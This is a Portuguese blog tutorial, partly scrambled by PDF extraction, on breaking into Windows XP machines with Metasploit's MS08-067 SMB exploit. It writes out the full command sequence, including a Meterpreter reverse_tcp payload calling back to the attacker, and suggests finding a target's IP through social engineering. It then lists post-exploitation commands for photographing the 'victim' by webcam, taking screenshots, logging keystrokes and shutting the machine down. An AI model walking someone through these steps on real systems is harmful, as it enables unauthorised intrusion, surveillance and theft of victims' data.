You are on page 1of 3

INÍCIO

/

GREEN HAT

/

ENTRE NA MATRIX

/

FAQ

/

SOBRE NÓS

Invadindo Windows XP
[Metasploit]
27 DE ABRIL DE 2015 / S0PH0S

Hoje traremos um tutorial voltado a pentest em sistema operacional XP, mesmo
estando descontinuado pela Microsoft ainda ele é muito utilizado por bancos, sistemas
comerciais, entre outros serviços. Utilizaremos um exploit que explora a falha da porta

Pesquisar …

PESQUISAR

Como previsto na Lei 12.737/2012 no
Art. 154-A invadir dispositivo
informático alheio, conectado ou não à
rede de computadores, mediante
violação indevida de mecanismo de
segurança e com o fim de obter,

smb (445) que permite uma conexão remota com a vítima. Ou seja ao conectarmos a

adulterar ou destruir dados ou

ela teremos controle total sobre o sistema dela, a qual permite interceptar dados,

informações sem autorização expressa

enviar malwares, acessar dispositivos na rede, entre outras coisas. Estaremos

ou tácita do titular do dispositivo ou

utilizando o Kali Linux como exemplo mas necessita apenas baixar e instalar o

instalar vulnerabilidades para obter

Metasploit.

vantagem ilícita. Pena – detenção, de 3
(três) meses a 1 (um) ano, e multa.

Primeiro abra o terminal e digite comando que irá abrir nossa Metasploit:

# msfconsole

Ajude o CIência Hacker

Agora setamos o nosso exploit que iremos utilizar para invasão, como citei ele explora
a falha na porta SMB
Ciência Hacker
YouTube

6K

# use windows/smb/ms08_067_netapi
Após isso colocamos o IP de nosso alvo a qual você pode descobrir através de uma
engenharia social ou ferramenta de captura de IP.

Tweets de @cienciahacker

# set RHOST 192.168.2.108
Setamos nosso PAYLOAD que fará a nossa interação com o a vítima.

Ciência Hacker

 Artigos.# set PAYLOAD windows/meterpreter/reverse_tcp E o nosso IP que receberá a conexão da vítima.103 Por último rodamos o exploit.2. Pentest I NVADI NDO EXPLOI T WI NDOWS XP METASPLOI T s0ph0s@cienciahacker:~# whoami _ "With great power comes great responsibility" Compartilhe esse post: Facebook Twitter Google+ .168. ou tenha algum firewall que posso bloquear essa conexão. # exploit Quando inserir o ultimo comando automaticamente ele irá se conectar com a vítima. Alguns comandos que podem ser usados durante a conexão com a vítima: webcam_snap (tira a foto pela webcam) screenshot (tira print da tela da vítima) keyscan_start (inicia processo de capturar teclas digitas) keyscan_dump (mostra as teclas digitas da vítima) shutdown -s -t 1 (desliga computador da vítima) sysinfo (mostra a versão do sistema operacional e informações dela) Nota: Esse processo pode falhar se as atualizações do sistema operacional estiverem atualizadas. permitindo que você controle ela do jeito que quiser. # set LHOST 192.

Instalando e usando o Proxychains Testando vulnerabilidade em sites com Acunetix (Scanning) Deixe uma resposta O seu endereço de email não será publicado Campos obrigatórios são marcados * Nome * Email * Site Comentário Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> Publicar comentário .